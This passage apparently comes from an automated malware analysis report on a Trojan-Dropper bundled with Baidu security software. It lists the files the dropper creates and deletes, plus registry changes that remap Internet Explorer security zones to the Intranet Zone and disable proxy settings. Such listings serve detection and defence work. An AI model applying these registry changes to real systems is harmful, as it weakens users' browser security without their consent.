%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (484 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepMgr.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Cooly_PluginConfig.xml (720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KavUpdate.dll (9320 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\901.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\GameNoDisturb.ini (215 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\BDAVCScan.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVWsc.exe (13368 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\monitor_config.dat (559 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\810.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDKitUtils.dll (54 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\Cooly_PluginConfig.xml (720 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayPlugin.rdb (20624 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\cache_config.dat (469 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\bd0003.sys (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMBase.dll (32128 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdSvc.exe (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\KVInstallHelper.dll (12536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVCached.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGX3.tmp (12 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0003.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\uninst.exe (28288 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdmp.dat (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bduf.dll (11048 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMPatchAgent.dll (26 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\HIPS.dll (7345 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\FileMon.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ToastLogo.ico (12024 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\hips.xml (17 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMWrench.sys (3616 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bd0001.dll (673 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Program Files%\Common Files\Adobe\Acrobat\ActiveX (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\TrustAndIso.dll (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\virus_type.dat (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDConfig.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKitUtils.dll (1856 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\npBaiduSDDetectPlug.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepBase.dll (5873 bytes)
%Program Files%\Messenger (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\FileMon.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMDownload.dll (11344 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\kav_verify.dat (677 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDLogicUtils.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDConfig.dll (3361 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUpdate.exe (3361 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMRepBase.dll (27704 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand64.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\cache_config.dat (469 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMReport.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\TrayPluginContainerConfig.xml (945 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\NetService.ini (615 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Cookies (192 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\bd0001.sys (601 bytes)

The Trojan-Dropper deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSRCore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDDownLoadProtectPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\iexplore.exe.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\monitor_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDPerflog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDShellExt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0002.sys (0 bytes)
C:\s11g (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVMainFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0001.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\811.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVMainframe_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDShellExt64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDownloadProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSDWrench.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\RtpContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMAVEng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMAVCached.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDownloadProtect_x64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\tuopan.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\DesktopToast.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\809.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\806.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDeskBand64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\tips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\systemfile.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\hips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKitUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMNet.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\dnw.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMStringUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\CoolyContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVMainframePluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMWrench.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bduf.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\DriverManager.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KavUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVTrayTipsPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDUDiskGuard.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bdvs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMPatchAgent.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdRepair.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\fm.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMAVE.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVVirusPlugins.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\PrivacyProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDAVCScan.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMEvents.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bdmp.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ad.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDDownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMMsg.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMRepMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\updlog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\CompatibilityChecker.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDCooly.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDeskBand.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDArKit.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdUProxy64.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\900.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMPerfMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSREng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\HIPS.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\RepairPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\npBaiduSDDetectPlug.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\baidusdRepair.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVRtp_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\scan_mgr_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\app.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\UserDetectionPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVRmvDevPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVTray_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVLogs.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\804.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\GameNoDisturb.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\duilib license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVWsc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\810.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\directui license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdTray.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ieBaiduSDDetectPlug.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\Cooly_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMBase.dll (0 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0003.sys (0 bytes)
%Program Files%\s11g (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ToastLogo.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\Repair_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BSRLib.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\901.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\TrustAndIso.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\virus_type.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\FileMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\kav_verify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMRepBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\cache_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ToastImage.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\TrayPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdSvc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDLogicUtils.dll (0 bytes)

The process BaiduSdSvc.exe:2716 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db (149 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (532 bytes)

The Trojan-Dropper deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000001 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000001 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\CURRENT (0 bytes)

The process BDDownloader.exe:2896 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Program Files%\Common Files\Baidu\BDDownload\106\bddownloader.exe (9605 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\dl.dll (14988 bytes)

The process BDDownloader.exe:2700 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

%Program Files%\Baidu\BaiduSd\1.8.0.1255\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-1-1-41-38]\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-1-1-41-38]\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-1-1-41-38]\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-1-1-41-38]\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB.tmp (90616 bytes)

The Trojan-Dropper deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsyA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC.tmp\System.dll (0 bytes)

Registry activity

The process BaiduSd.exe:3596 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 5F 34 52 C0 1D 30 33 2A 86 3E 30 6E B1 7A B8"

The process shandian.exe:1588 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 4D FC 5A CF 0B CC 9B DE 01 05 12 78 BB C6 BD"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Dropper modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Dropper modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Dropper modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process shandian.exe:476 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014060120140602]
"CacheLimit" = "8192"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

